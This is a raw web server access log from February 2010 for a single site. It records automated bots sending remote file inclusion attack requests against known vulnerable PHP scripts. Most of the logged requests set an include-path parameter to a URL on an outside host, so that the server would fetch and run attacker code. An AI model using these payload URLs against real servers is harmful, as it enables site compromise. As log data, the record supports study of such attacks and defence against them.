216.119.103.16 - - [25/Feb/2010:07:58:11 -0800] "GET /logs/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:58:11 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:58:11 -0800] "GET /logs/access_100123.log%20%20/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:12 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:58:13 -0800] "GET /logs/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:58:13 -0800] "GET /logs/access_100123.log%20%20/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:58:14 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:15 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:07:58:39 -0800] "GET /logs/access_100215.log//WebKalender//tools/send_reminders.php?noSet=0&includedir=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
124.115.6.13 - - [25/Feb/2010:07:58:54 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:05 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:05 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:06 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:15 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:15 -0800] "GET /logs/access_100218.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:15 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:24 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:24 -0800] "GET /logs/access_100218.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:24 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:24 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:59:26 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:32 -0800] "GET /logs/access_100207.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:34 -0800] "GET /logs/access_100218.log%20%20/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:36 -0800] "GET /logs/access_100218.log%20%20/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:59:36 -0800] "GET /logs/?sourcedir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:59:36 -0800] "GET /logs/access_100123.log/?sourcedir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:59:36 -0800] "GET /?sourcedir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:38 -0800] "GET /phphtml.php?htmlclass_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:38 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:59:39 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:01 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:02 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:02 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:13 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:13 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:14 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:26 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:27 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:27 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:31 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:31 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:31 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:38 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:38 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:38 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:00:59 -0800] "GET /logs/access_100208.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:01:00 -0800] "GET /logs/access_100208.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:01:06 -0800] "GET /logs/access_100208.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:01:10 -0800] "GET /logs/access_100208.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:08:01:12 -0800] "GET /logs/access_100208.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:08:01:26 -0800] "GET /logs/access_100201.log/?sourcedir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:08:02:20 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:08:02:50 -0800] "GET /logs/access_100218.log//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:08:02:50 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:08:02:50 -0800] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:04 -0800] "GET /logs/index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:05 -0800] "GET /index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:07 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:08:03:22 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:25 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:26 -0800] "GET /logs/index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:26 -0800] "GET /index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:03:32 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:35 -0800] "GET /logs/access_100203.log%20%20/index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:08:03:44 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:08:03:47 -0800] "GET /logs/access_100203.log%20%20/index.php?conteudo=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:08:03:53 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:08:04:38 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:04:54 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:04:54 -0800] "GET /logs/access_100203.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:04:54 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:08:04:57 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:04:57 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:04:57 -0800] "GET /logs/access_100203.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:04:57 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:05:01 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:05:01 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:05:01 -0800] "GET /logs/access_100203.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:05:10 -0800] "GET /logs/access_100206.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:05:28 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:05:28 -0800] "GET /logs/access_100203.log//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:05:28 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:05:44 -0800] "GET /logs/access_100120.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:05:44 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:05:44 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:05:49 -0800] "GET /logs/access_100206.log//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:08:05:57 -0800] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:08:05:57 -0800] "GET /logs/access_100218.log//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:08:05:57 -0800] "GET /logs//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:06:27 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:06:27 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:06:27 -0800] "GET /logs/access_100120.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:06:58 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:06:58 -0800] "GET /logs/access_100120.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:06:58 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:08:07:15 -0800] "GET /logs/access_100212.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:10:42 -0800] "GET /logs/access_100128.log//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:11:20 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:11:20 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:11:20 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:11:56 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:12:27 -0800] "GET /logs/access_100128.log//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:12:48 -0800] "GET /logs/access_100120.log//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:13:15 -0800] "GET /logs/access_100120.log//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:14:00 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:14:00 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:14:00 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:08:14:42 -0800] "GET /logs/access_100120.log//skin/happycast_category_lightblack/login.php?dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:08:14:49 -0800] "GET ///download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:08:14:49 -0800] "GET /logs/access_100203.log%20%20////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:08:14:49 -0800] "GET /logs////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:14:57 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:14:57 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:14:57 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:08:14:59 -0800] "GET /logs/access_100206.log%20%20////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:15:00 -0800] "GET /become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:15:00 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:15:00 -0800] "GET /logs/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
